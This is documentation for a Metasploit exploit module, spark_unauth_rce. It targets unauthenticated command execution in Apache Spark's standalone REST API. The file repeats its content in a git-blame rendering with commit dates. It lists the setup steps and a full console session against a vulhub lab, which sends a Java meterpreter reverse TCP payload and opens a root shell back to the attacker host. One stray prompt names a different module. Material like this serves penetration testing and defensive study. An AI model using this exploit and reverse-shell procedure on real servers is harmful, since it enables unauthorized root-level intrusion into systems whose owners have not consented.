documentation/modules/exploit/linux/http/spark_unauth_rce.md

## Description

This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.
It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.

## Verification Steps

https://github.com/vulhub/vulhub/tree/master/spark/unacc 

`docker-compose up -d`

## Verification Steps

1. get session on target
2. `use exploit/linux/http/spark_unauth_rce`
3. `set payload <payload>`
4. `set rhosts <rhosts>`
5. `set rport <rport>`
6. `set srvhost <srvhost>`
7. `set srvport <srvport>`
8. `set lport <lport>`
9. `set lhost <lhost>`
10. `exploit`

## Scenarios

### Spark 2.3.1

```
msf5 > use exploit/linux/http/spark_unauth_rce
msf5 exploit(linux/http/spark_unauth_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(linux/http/spark_unauth_rce) > set rport 6066
rport => 6066
msf5 exploit(linux/http/spark_unauth_rce) > set srvhost 10.139.14.167
srvhost => 10.139.14.167
msf5 exploit(linux/http/spark_unauth_rce) > set srvport 9999
srvport => 9999
msf5 exploit(linux/http/spark_unauth_rce) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(linux/http/spark_unauth_rce) > set lhost 10.139.14.167
lhost => 10.139.14.167
msf5 exploit(linux/http/spark_unauth_rce) > set lport 5555
lport => 5555
msf5 exploit(linux/http/spark_unauth_rce) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.139.14.167:5555
msf5 exploit(linux/http/spark_unauth_rce) > [*] Starting up our web service ...
[*] Using URL: http://10.139.14.167:9999/feTYHNiHufrGI
[*] 127.0.0.1:6066 - Sending the payload to the server...
[*] Sending stage (53867 bytes) to 10.139.14.167
[*] Meterpreter session 2 opened (10.139.14.167:5555 -> 10.139.14.167:56021) at 2018-11-12 16:59:33 +0800
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions

Active sessions
===============

  Id  Name  Type                    Information          Connection
  --  ----  ----                    -----------          ----------
  2         meterpreter java/linux  root @ 96b2135aee9c  10.139.14.167:5555 -> 10.139.14.167:56021 (127.0.0.1)

msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter >
```
Update documentation 2018-11-29 08:28:39 -06:00			`## Description`
Add doc for exploit module spark_unauth_rce. 2018-11-12 17:08:36 +08:00
			`This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.`
			`It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.`

module options to options 2020-01-16 10:49:22 -05:00			`## Verification Steps`
Add doc for exploit module spark_unauth_rce. 2018-11-12 17:08:36 +08:00
			`https://github.com/vulhub/vulhub/tree/master/spark/unacc`

			`docker-compose up -d`

Update documentation 2018-11-29 08:28:39 -06:00			`## Verification Steps`
Add doc for exploit module spark_unauth_rce. 2018-11-12 17:08:36 +08:00
			`1. get session on target`
			2. `use exploit/linux/http/spark_unauth_rce`
			3. `set payload <payload>`
			4. `set rhosts <rhosts>`
			5. `set rport <rport>`
			6. `set srvhost <srvhost>`
			7. `set srvport <srvport>`
			8. `set lport <lport>`
			9. `set lhost <lhost>`
			10. `exploit`

Update documentation 2018-11-29 08:28:39 -06:00			`## Scenarios`
Add doc for exploit module spark_unauth_rce. 2018-11-12 17:08:36 +08:00
Update documentation 2018-11-29 08:28:39 -06:00			`### Spark 2.3.1`
Add doc for exploit module spark_unauth_rce. 2018-11-12 17:08:36 +08:00
			```
			`msf5 > use exploit/linux/http/spark_unauth_rce`
			`msf5 exploit(linux/http/spark_unauth_rce) > set rhosts 127.0.0.1`
			`rhosts => 127.0.0.1`
			`msf5 exploit(linux/http/spark_unauth_rce) > set rport 6066`
			`rport => 6066`
			`msf5 exploit(linux/http/spark_unauth_rce) > set srvhost 10.139.14.167`
			`srvhost => 10.139.14.167`
			`msf5 exploit(linux/http/spark_unauth_rce) > set srvport 9999`
			`srvport => 9999`
			`msf5 exploit(linux/http/spark_unauth_rce) > set payload java/meterpreter/reverse_tcp`
			`payload => java/meterpreter/reverse_tcp`
			`msf5 exploit(linux/http/spark_unauth_rce) > set lhost 10.139.14.167`
			`lhost => 10.139.14.167`
			`msf5 exploit(linux/http/spark_unauth_rce) > set lport 5555`
			`lport => 5555`
			`msf5 exploit(linux/http/spark_unauth_rce) > exploit`
			`[*] Exploit running as background job 3.`
			`[*] Exploit completed, but no session was created.`

			`[*] Started reverse TCP handler on 10.139.14.167:5555`
			`msf5 exploit(linux/http/spark_unauth_rce) > [*] Starting up our web service ...`
			`[*] Using URL: http://10.139.14.167:9999/feTYHNiHufrGI`
			`[*] 127.0.0.1:6066 - Sending the payload to the server...`
			`[*] Sending stage (53867 bytes) to 10.139.14.167`
			`[*] Meterpreter session 2 opened (10.139.14.167:5555 -> 10.139.14.167:56021) at 2018-11-12 16:59:33 +0800`
			`msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions`

			`Active sessions`
			`===============`

			`Id Name Type Information Connection`
			`-- ---- ---- ----------- ----------`
			`2 meterpreter java/linux root @ 96b2135aee9c 10.139.14.167:5555 -> 10.139.14.167:56021 (127.0.0.1)`

			`msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 2`
			`[*] Starting interaction with 2...`

			`meterpreter > getuid`
			`Server username: root`
			`meterpreter >`
			```